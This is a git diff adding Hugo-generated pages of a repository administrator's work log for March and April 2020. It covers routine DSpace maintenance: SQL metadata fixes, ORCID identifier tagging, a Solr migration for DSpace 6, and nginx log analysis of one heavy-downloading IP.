+<pre tabindex="0"><code>dspace=# SELECT DISTINCT text_lang, COUNT(*) FROM metadatavalue WHERE resource_type_id=2 AND resource_id in (111295,111294,111293,111292,111291,111290,111288,111286,111285,111284,111283,111282,111281,111280,111279,111278,111277,111276,111275,111274,111273,111272,111271,111270,111269,111268,111267,111266,111265,111264,111263,111262,111261,111260,111259,111258,111257,111256,111255,111254,111253,111252,111251,111250,111249,111248,111247,111246,111245,111244,111243,111242,111241,111240,111238,111237,111236,111235,111234,111233,111232,111231,111230,111229,111228,111227,111226,111225,111224,111223,111222,111221,111220,111219,111218,111217,111216,111215,111214,111213,111212,111211,111209,111208,111207,111206,111205,111204,111203,111202,111201,111200,111199,111198,111197,111196,111195,111194,111193,111192,111191,111190,111189,111188,111187,111186,111185,111184,111183,111182,111181,111180,111179,111178,111177,111176,111175,111174,111173,111172,111171,111170,111169,111168,111299,111298,111297,111296,111167,111166,111165,111164,111163,111162,111161,111160,111159,111158,111157,111156,111155,111154,111153,111152,111151,111150,111149,111148,111147,111146,111145,111144,111143,111142,111141,111140,111139,111138,111137,111136,111135,111134,111133,111132,111131,111129,111128,111127,111126,111125) GROUP BY text_lang ORDER BY count;
+</code></pre><ul>
+<li>Then I exported the metadata from DSpace Test and imported it into OpenRefine
+<ul>
+<li>I corrected one invalid AGROVOC subject using my <code>csv-metadata-quality</code> script</li>
+</ul>
+</li>
+<li>I exported a new list of affiliations from the database, added line numbers with <code>csvcut</code>, and then validated them in OpenRefine using <code>reconcile-csv</code>:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2020-03-12-affiliations.csv WITH CSV HEADER;`
+dspace=# \q
+$ csvcut -l -c 0 /tmp/2020-03-12-affiliations.csv | sed -e &#39;s/^line_number/id/&#39; -e &#39;s/text_value/name/&#39; &gt; /tmp/affiliations.csv
+$ lein run /tmp/affiliations.csv name id
+</code></pre><ul>
+<li>I always forget how to copy the reconciled values in OpenRefine, but you need to make a new column and populate it using this GREL: <code>if(cell.recon.matched, cell.recon.match.name, value)</code></li>
+<li>I mapped all 170 items to their appropriate collections based on type and uploaded them to CGSpace</li>
+</ul>
+<h2 id="2020-03-16">2020-03-16</h2>
+<ul>
+<li>I&rsquo;m looking at the CPU usage of CGSpace (linode18) over the past year and I see we <em>rarely</em> even go over two CPUs on average sustained usage:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/03/cgspace-cpu-year.png" alt="linode18 CPU usage year"></p>
+<ul>
+<li>Also clearly visible is the effect of CPU steal in 2019-03</li>
+</ul>
+<p><img src="/cgspace-notes/2020/03/cgspace-memory-year.png" alt="linode18 RAM usage year"></p>
+<p><img src="/cgspace-notes/2020/03/cgspace-heap-year.png" alt="linode18 JVM heap usage year"></p>
+<ul>
+<li>At max we have committed 10GB of RAM, the rest is used opportunistically by the filesystem cache, likely for Solr
+<ul>
+<li>There was a huge drop in 2019-07 when I changed the JVM settings</li>
+<li>I think we should re-evaluate our deployment and perhaps target a different instance type and add block storage for assetstore (as we determined Linode&rsquo;s block storage to be too slow for Solr)</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-03-17">2020-03-17</h2>
+<ul>
+<li>Update the PostgreSQL JDBC driver to version 42.2.11</li>
+<li>Maria from Bioversity asked me to add a new field for the combined subjects of Bioversity and CIAT, since they merged recently
+<ul>
+<li>We will use <code>cg.subject.alliancebiovciat</code></li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-03-18">2020-03-18</h2>
+<ul>
+<li>Provision new Linode server (linode26) for DSpace Test to replace the current linode19 server</li>
+<li>Improve DSpace role of <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a>
+<ul>
+<li>We should install npm packages in the DSpace user&rsquo;s home directory instead of globally as root</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-03-19">2020-03-19</h2>
+<ul>
+<li>Finalized migration of DSpace Test to linode26 and removed linode19</li>
+</ul>
+<h2 id="2020-03-22">2020-03-22</h2>
+<ul>
+<li>Look over the AReS ToRs sent by Enrico and Moayad and add a few notes about missing GitHub issues
+<ul>
+<li>Hopefully now they can start working on the development!</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-03-24">2020-03-24</h2>
+<ul>
+<li>Skype meeting about CGSpace with Peter and Abenet</li>
+</ul>
+<h2 id="2020-03-25">2020-03-25</h2>
+<ul>
+<li>I sent Atmire a message to ask if they managed to start working on the DSpace 6 port, as the last communication was twenty-six days ago when they said they were going to secure technical resources to do so</li>
+<li>Start adapting the <code>dspace</code> role in our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a> for DSpace 6 support</li>
+</ul>
+<h2 id="2020-03-26">2020-03-26</h2>
+<ul>
+<li>More work adapting the <code>dspace</code> role in our Ansible infrastructure scripts to DSpace 6</li>
+<li>Update Tomcat to version 7.0.103 in the Ansible infrastrcutrue playbooks and deploy on DSpace Test (linode26)</li>
+<li>Maria sent me a few new ORCID identifiers from Bioversity so I combined them with our existing ones, filtered the unique ones, and then resolved their names using my <code>resolve-orcids.py</code> script:</li>
+</ul>
+<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcids | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2020-03-26-combined-orcids.txt
+$ ./resolve-orcids.py -i /tmp/2020-03-26-combined-orcids.txt -o /tmp/2020-03-26-combined-names.txt -d
+# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+</code></pre><ul>
+<li>I checked the database for likely matches to the author name and then created a CSV with the author names and ORCID iDs:</li>
+</ul>
+<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
+&#34;King, Brian&#34;,&#34;Brian King: 0000-0002-7056-9214&#34;
+&#34;Ortiz-Crespo, Berta&#34;,&#34;Berta Ortiz-Crespo: 0000-0002-6664-0815&#34;
+&#34;Ekesa, Beatrice&#34;,&#34;Beatrice Ekesa: 0000-0002-2630-258X&#34;
+&#34;Ekesa, B.&#34;,&#34;Beatrice Ekesa: 0000-0002-2630-258X&#34;
+&#34;Ekesa, B.N.&#34;,&#34;Beatrice Ekesa: 0000-0002-2630-258X&#34;
+&#34;Gullotta, G.&#34;,&#34;Gaia Gullotta: 0000-0002-2240-3869&#34;
+</code></pre><ul>
+<li>Running the <code>add-orcid-identifiers-csv.py</code> script I added 32 ORCID iDs to items on CGSpace!</li>
+</ul>
+<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/2020-03-26-ciat-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>Udana from IWMI asked about some items that are missing Altmetric donuts on CGSpace
+<ul>
+<li><a href="https://hdl.handle.net/10568/103225">One of them</a> had a link to the paper on Nature, but was missing a DOI</li>
+<li><a href="https://hdl.handle.net/10568/106899">The second item</a> had no donut so I <a href="https://twitter.com/mralanorth/status/1243158045540134913">tweeted its handle</a></li>
+<li><a href="https://hdl.handle.net/10568/107258">The third item</a> also had no handle so I <a href="https://twitter.com/mralanorth/status/1243158786392625153">tweeted it</a> as well</li>
+</ul>
+</li>
+<li>Abenet pointed out <a href="https://hdl.handle.net/10568/106573">one item</a> that she had tweeted last week that is missing a donut as well, so I <a href="https://twitter.com/mralanorth/status/1243163710241345536">tweeted it</a> too</li>
+</ul>
+<h2 id="2020-03-29">2020-03-29</h2>
+<ul>
+<li>Add two more Bioversity ORCID iDs to CGSpace and then tag ~70 of the authors&rsquo; existing publications in the database using this CSV with my <code>add-orcid-identifiers-csv.py</code> script:</li>
+</ul>
+<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
+&#34;Snook, L.K.&#34;,&#34;Laura Snook: 0000-0002-9168-1301&#34;
+&#34;Snook, L.&#34;,&#34;Laura Snook: 0000-0002-9168-1301&#34;
+&#34;Zheng, S.J.&#34;,&#34;Sijun Zheng: 0000-0003-1550-3738&#34;
+&#34;Zheng, S.&#34;,&#34;Sijun Zheng: 0000-0003-1550-3738&#34;
+</code></pre><ul>
+<li>Deploy latest Bioversity and CIAT updates on CGSpace (linode18) and DSpace Test (linode26)</li>
+<li>Deploy latest Ansible infrastructure playbooks on CGSpace and DSpace Test to get the latest dspace-statistics-api (v1.1.1) and Tomcat (7.0.103) versions</li>
+<li>Run system updates on CGSpace and DSpace Test and reboot them
+<ul>
+<li>After reboot all the Solr statistics cores came back up on the first time on both servers (yay)</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2020-04/index.html b/docs/2020-04/index.html
new file mode 100644
index 000000000..2b4b65df8
--- /dev/null
+++ b/docs/2020-04/index.html
@@ -0,0 +1,712 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="April, 2020" />
+<meta property="og:description" content="2020-04-02
+
+Maria asked me to update Charles Staver&rsquo;s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it
+
+I updated the fifty-eight existing items on CGSpace
+
+
+Looking into the items Udana had asked about last week that were missing Altmetric donuts:
+
+The first is still missing its DOI, so I added it and tweeted its handle (after a few hours there was a donut with score 222)
+The second item now has a donut with score 2 since I tweeted its handle last week
+The third item now has a donut with score 1 since I tweeted it last week
+
+
+On the same note, the one item Abenet pointed out last week now has a donut with score of 104 after I tweeted it last week
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2020-04/" />
+<meta property="article:published_time" content="2020-04-02T10:53:24+03:00" />
+<meta property="article:modified_time" content="2020-05-31T20:15:08+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="April, 2020"/>
+<meta name="twitter:description" content="2020-04-02
+
+Maria asked me to update Charles Staver&rsquo;s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it
+
+I updated the fifty-eight existing items on CGSpace
+
+
+Looking into the items Udana had asked about last week that were missing Altmetric donuts:
+
+The first is still missing its DOI, so I added it and tweeted its handle (after a few hours there was a donut with score 222)
+The second item now has a donut with score 2 since I tweeted its handle last week
+The third item now has a donut with score 1 since I tweeted it last week
+
+
+On the same note, the one item Abenet pointed out last week now has a donut with score of 104 after I tweeted it last week
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "April, 2020",
+  "url": "https://alanorth.github.io/cgspace-notes/2020-04/",
+  "wordCount": "3406",
+  "datePublished": "2020-04-02T10:53:24+03:00",
+  "dateModified": "2020-05-31T20:15:08+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2020-04/">
+
+    <title>April, 2020 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-04/">April, 2020</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2020-04-02T10:53:24+03:00">Thu Apr 02, 2020</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-04-02">2020-04-02</h2>
+<ul>
+<li>Maria asked me to update Charles Staver&rsquo;s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it
+<ul>
+<li>I updated the fifty-eight existing items on CGSpace</li>
+</ul>
+</li>
+<li>Looking into the items Udana had asked about last week that were missing Altmetric donuts:
+<ul>
+<li><a href="https://hdl.handle.net/10568/103225">The first</a> is still missing its DOI, so I added it and <a href="https://twitter.com/mralanorth/status/1245632619661766657">tweeted its handle</a> (after a few hours there was a donut with score 222)</li>
+<li><a href="https://hdl.handle.net/10568/106899">The second item</a> now has a donut with score 2 since I <a href="https://twitter.com/mralanorth/status/1243158045540134913">tweeted its handle</a> last week</li>
+<li><a href="https://hdl.handle.net/10568/107258">The third item</a> now has a donut with score 1 since I <a href="https://twitter.com/mralanorth/status/1243158786392625153">tweeted it</a> last week</li>
+</ul>
+</li>
+<li>On the same note, the <a href="https://hdl.handle.net/10568/106573">one item</a> Abenet pointed out last week now has a donut with score of 104 after I <a href="https://twitter.com/mralanorth/status/1243163710241345536">tweeted it</a> last week</li>
+</ul>
+<ul>
+<li>Altmetric responded about <a href="https://hdl.handle.net/10568/101286">one item</a> that had no donut since at least 2019-12 and said they fixed some problems with their bot&rsquo;s user agent
+<ul>
+<li>I decided to <a href="https://twitter.com/mralanorth/status/1245703049445851140">tweet the item</a>, as I can&rsquo;t remember if I ever did it before</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-04-05">2020-04-05</h2>
+<ul>
+<li>Update PostgreSQL JDBC driver to version 42.2.12</li>
+</ul>
+<h2 id="2020-04-07">2020-04-07</h2>
+<ul>
+<li>Yesterday Atmire sent me their <a href="https://github.com/ilri/DSpace/pull/445">pull request for DSpace 6 modules</a></li>
+<li>Peter pointed out that some items have his ORCID identifier (<code>cg.creator.id</code>) twice
+<ul>
+<li>I think this is because my early <code>add-orcid-identifiers.py</code> script was adding identifiers to existing records without properly checking if there was already one present (at first it only checked if there was one with the exact <code>place</code> value)</li>
+<li>As a test I dropped all his ORCID identifiers and added them back with the <code>add-orcid-identifiers.py</code> script:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ psql -h localhost -U postgres dspace -c &#34;DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value LIKE &#39;%Ballantyne%&#39;;&#34;
+DELETE 97
+$ ./add-orcid-identifiers-csv.py -i 2020-04-07-peter-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
+</code></pre><ul>
+<li>I used this CSV with the script (all records with his name have the name standardized like this):</li>
+</ul>
+<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
+&#34;Ballantyne, Peter G.&#34;,&#34;Peter G. Ballantyne: 0000-0001-9346-2893&#34;
+</code></pre><ul>
+<li>Then I tried another way, to identify all duplicate ORCID identifiers for a given resource ID and group them so I can see if count is greater than 1:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT(resource_id, text_value) as distinct_orcid, COUNT(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 240 GROUP BY distinct_orcid ORDER BY count DESC) TO /tmp/2020-04-07-duplicate-orcids.csv WITH CSV HEADER;
+COPY 15209
+</code></pre><ul>
+<li>Of those, about nine authors had duplicate ORCID identifiers over about thirty records, so I created a CSV with all their name variations and ORCID identifiers:</li>
+</ul>
+<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
+&#34;Ballantyne, Peter G.&#34;,&#34;Peter G. Ballantyne: 0000-0001-9346-2893&#34;
+&#34;Ramirez-Villegas, Julian&#34;,&#34;Julian Ramirez-Villegas: 0000-0002-8044-583X&#34;
+&#34;Villegas-Ramirez, J&#34;,&#34;Julian Ramirez-Villegas: 0000-0002-8044-583X&#34;
+&#34;Ishitani, Manabu&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
+&#34;Manabu, Ishitani&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
+&#34;Ishitani, M.&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
+&#34;Ishitani, M.&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
+&#34;Buruchara, Robin A.&#34;,&#34;Robin Buruchara: 0000-0003-0934-1218&#34;
+&#34;Buruchara, Robin&#34;,&#34;Robin Buruchara: 0000-0003-0934-1218&#34;
+&#34;Jarvis, Andy&#34;,&#34;Andy Jarvis: 0000-0001-6543-0798&#34;
+&#34;Jarvis, Andrew&#34;,&#34;Andy Jarvis: 0000-0001-6543-0798&#34;
+&#34;Jarvis, A.&#34;,&#34;Andy Jarvis: 0000-0001-6543-0798&#34;
+&#34;Tohme, Joseph M.&#34;,&#34;Joe Tohme: 0000-0003-2765-7101&#34;
+&#34;Hansen, James&#34;,&#34;James Hansen: 0000-0002-8599-7895&#34;
+&#34;Hansen, James W.&#34;,&#34;James Hansen: 0000-0002-8599-7895&#34;
+&#34;Asseng, Senthold&#34;,&#34;Senthold Asseng: 0000-0002-7583-3811&#34;
+</code></pre><ul>
+<li>Then I deleted <em>all</em> their existing ORCID identifier records:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value SIMILAR TO &#39;%(0000-0001-6543-0798|0000-0001-9346-2893|0000-0002-6950-4018|0000-0002-7583-3811|0000-0002-8044-583X|0000-0002-8599-7895|0000-0003-0934-1218|0000-0003-2765-7101)%&#39;;
+DELETE 994
+</code></pre><ul>
+<li>And then I added them again using the <code>add-orcid-identifiers</code> records:</li>
+</ul>
+<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2020-04-07-fix-duplicate-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
+</code></pre><ul>
+<li>I ran the fixes on DSpace Test and CGSpace as well</li>
+<li>I started testing the <a href="https://github.com/ilri/DSpace/pull/445">pull request</a> sent by Atmire yesterday
+<ul>
+<li>I notice that we now need <code>yarn</code> to build, and I need to bump the Node.js <code>engine</code> version in our Mirage 2 theme in order to get it to build on Node.js 10.x</li>
+<li>Font Awesome icons for GitHub etc weren&rsquo;t loading, and after a bit of troubleshooting I replaced version 4.5.0 with 5.13.0 and to my surprise they now include Mendeley and ORCID so we can get rid of the Academicons dependency</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-04-12">2020-04-12</h2>
+<ul>
+<li>Testing the Atmire DSpace 6.3 code with a clean CGSpace DSpace 5.8 database snapshot
+<ul>
+<li>One Flyway migration failed so I had to manually remove it (and of course create the pgcrypto extension):</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace63=# DELETE FROM schema_version WHERE version IN (&#39;5.8.2015.12.03.3&#39;);
+dspace63=# CREATE EXTENSION pgcrypto;
+</code></pre><ul>
+<li>Then DSpace 6.3 started up OK and I was able to see some statistics in the Content and Usage Analysis (CUA) module, but not on community, collection, or item pages
+<ul>
+<li>I also noticed at least one of these errors in the DSpace log:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>2020-04-12 16:34:33,363 ERROR com.atmire.dspace.app.xmlui.aspect.statistics.editorparts.DataTableTransformer @ java.lang.IllegalArgumentException: Invalid UUID string: 1
+</code></pre><ul>
+<li>And I remembered I actually need to run the DSpace 6.4 Solr UUID migrations:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;
+$ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
+</code></pre><ul>
+<li>Run system updates on DSpace Test (linode26) and reboot it</li>
+<li>More work on the DSpace 6.3 stuff, improving the GDPR consent logic to use <a href="https://github.com/chiiya/haven">haven</a> instead of cookieconsent
+<ul>
+<li>It works better by injecting the Google Analytics script after the user clicks agree, and it also has a preferences section that gets automatically injected on the privacy page!</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-04-13">2020-04-13</h2>
+<ul>
+<li>I realized that <code>solr-upgrade-statistics-6x</code> only processes 100,000 records by default so I think we actually need to finish running it for all legacy Solr records before asking Atmire why CUA statlets and detailed statistics aren&rsquo;t working</li>
+<li>For now I am just doing 250,000 records at a time on my local environment:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx2000m -Dfile.encoding=UTF-8&#34;
+$ ~/dspace63/bin/dspace solr-upgrade-statistics-6x -n 250000
+</code></pre><ul>
+<li>Despite running the migration for all of my local 1.5 million Solr records, I still see a few hundred thousand like <code>-1</code> and <code>0-unmigrated</code>
+<ul>
+<li>I will purge them all and try to import only a subset&hellip;</li>
+<li>After importing again I see there are indeed tens of thousands of these documents with IDs &ldquo;-1&rdquo; and &ldquo;0&rdquo;</li>
+<li>They are all <code>type: 5</code>, which is &ldquo;SITE&rdquo; according to <code>Constants.java</code>:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>/** DSpace site type */
+public static final int SITE = 5;
+</code></pre><ul>
+<li>Even after deleting those documents and re-running <code>solr-upgrade-statistics-6x</code> I still get the UUID errors when using CUA and the statlets</li>
+<li>I have sent some feedback and questions to Atmire (including about the Â issue with glypicons in the header trail)</li>
+<li>In other news, my local Artifactory container stopped working for some reason so I re-created it and it seems some things have changed upstream (port 8082 for web UI?):</li>
+</ul>
+<pre tabindex="0"><code>$ podman rm artifactory
+$ podman pull docker.bintray.io/jfrog/artifactory-oss:latest
+$ podman create --ulimit nofile=32000:32000 --name artifactory -v artifactory_data:/var/opt/jfrog/artifactory -p 8081-8082:8081-8082 docker.bintray.io/jfrog/artifactory-oss
+$ podman start artifactory
+</code></pre><h2 id="2020-04-14">2020-04-14</h2>
+<ul>
+<li>A few days ago Peter asked me to update an author&rsquo;s name on CGSpace and in the controlled vocabularies:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=&#39;Knight-Jones, Theodore J.D.&#39; WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value=&#39;Knight-Jones, T.J.D.&#39;;
+</code></pre><ul>
+<li>I updated his existing records on CGSpace, changed the controlled lists, added his ORCID identifier to the controlled list, and tagged his thirty-nine items with the ORCID iD</li>
+<li>The new DSpace 6 stuff that Atmire sent modifies the Mirage 2&rsquo;s <code>pom.xml</code> to copy the each theme&rsquo;s resulting <code>node_modules</code> to each theme after building and installing with <code>ant update</code> because they moved some packages from bower to npm and now reference them in <code>page-structure.xsl</code>
+<ul>
+<li>This is a good idea, because bower is no longer supported, and npm has gotten a lot better, but it causes an extra 200,000 files to get copied!</li>
+<li>Most scripts are concatenated into <code>theme.js</code> during build, so we don&rsquo;t need the <code>node_modules</code> after that, but there are three scripts in <code>page-structure.xsl</code> that are not included there</li>
+<li>The scripts are a very old version of modernizr which is not even available on npm, html5shiv, and respond.js</li>
+<li>For modernizr I can simply download a static copy and put it in <code>0_CGIAR/scripts</code> and concatenate it into <code>theme.js</code></li>
+<li>For the others, I can revert to using them from bower&rsquo;s <code>vendor</code> directory, which is installed by the parent XMLUI Mirage 2 theme</li>
+<li>During this process I also realized that <code>mvn clean</code> doesn&rsquo;t actually clean everything, and <code>dspace/modules/xmlui-mirage2/target</code> is remaining from previous builds and contains a bunch of shit from previous builds (including all the themes which I was trying to build without!)
+<ul>
+<li>This must be a DSpace bug, but I should theoretically check on vanilla DSpace and then file a bug&hellip;</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-04-17">2020-04-17</h2>
+<ul>
+<li>Atmire responded to some of the issues I raised earlier this week about the DSpace 6 pull request
+<ul>
+<li>They said they don&rsquo;t think the glyphicon encoding issue is due to their changes, but I built a new clean version of the vanilla <code>6_x-dev</code> branch from before their pull request and it <em>does not</em> have the encoding issue in the Mirage 2 header trails</li>
+<li>Also, they said we need to use something called <code>AtomicStatisticsUpdateCLI</code> to do the Solr legacy integer ID to UUID conversion so I asked for more information about that workflow</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-04-20">2020-04-20</h2>
+<ul>
+<li>Looking into a high rate of outgoing bandwidth from yesterday on CGSpace (linode18):</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;19/Apr/2020:0[6789]&#34; | goaccess --log-format=COMBINED -
+</code></pre><ul>
+<li>One host in Russia (91.241.19.70) download 23GiB over those few hours in the morning
+<ul>
+<li>It looks like all the requests were for one single item&rsquo;s bitstreams:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># grep -c 91.241.19.70 /var/log/nginx/access.log.1
+8900
+# grep 91.241.19.70 /var/log/nginx/access.log.1 | grep -c &#39;10568/35187&#39;
+8900
+</code></pre><ul>
+<li>I thought the host might have been Yandex misbehaving, but its user agent is:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; nl-nl) AppleWebKit/527  (KHTML, like Gecko) Version/3.1.1 Safari/525.20
+</code></pre><ul>
+<li>I will purge that IP from the Solr statistics using my <code>check-spider-ip-hits.sh</code> script:</li>
+</ul>
+<pre tabindex="0"><code>$ ./check-spider-ip-hits.sh -d -f /tmp/ip -p
+(DEBUG) Using spider IPs file: /tmp/ip
+(DEBUG) Checking for hits from spider IP: 91.241.19.70
+Purging 8909 hits from 91.241.19.70 in statistics
+
+Total number of bot hits purged: 8909
+</code></pre><ul>
+<li>While investigating that I noticed ORCID identifiers missing from a few authors names, so I added them with my <code>add-orcid-identifiers.py</code> script:</li>
+</ul>
+<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2020-04-20-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
+</code></pre><ul>
+<li>The contents of <code>2020-04-20-add-orcids.csv</code> was:</li>
+</ul>
+<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
+&#34;Schut, Marc&#34;,&#34;Marc Schut: 0000-0002-3361-4581&#34;
+&#34;Schut, M.&#34;,&#34;Marc Schut: 0000-0002-3361-4581&#34;
+&#34;Kamau, G.&#34;,&#34;Geoffrey Kamau: 0000-0002-6995-4801&#34;
+&#34;Kamau, G&#34;,&#34;Geoffrey Kamau: 0000-0002-6995-4801&#34;
+&#34;Triomphe, Bernard&#34;,&#34;Bernard Triomphe: 0000-0001-6657-3002&#34;
+&#34;Waters-Bayer, Ann&#34;,&#34;Ann Waters-Bayer: 0000-0003-1887-7903&#34;
+&#34;Klerkx, Laurens&#34;,&#34;Laurens Klerkx: 0000-0002-1664-886X&#34;
+</code></pre><ul>
+<li>I confirmed some of the authors&rsquo; names from the report itself, then by looking at their profiles on ORCID.org</li>
+<li>Add new ILRI subject &ldquo;COVID19&rdquo; to the <code>5_x-prod</code> branch</li>
+<li>Add new CCAFS Phase II project tags to the <code>5_x-prod</code> branch</li>
+<li>I will deploy these to CGSpace in the next few days</li>
+</ul>
+<h2 id="2020-04-24">2020-04-24</h2>
+<ul>
+<li>Atmire responded to my ticket about the Â issue with glypicons and said their test server does not show this same issue
+<ul>
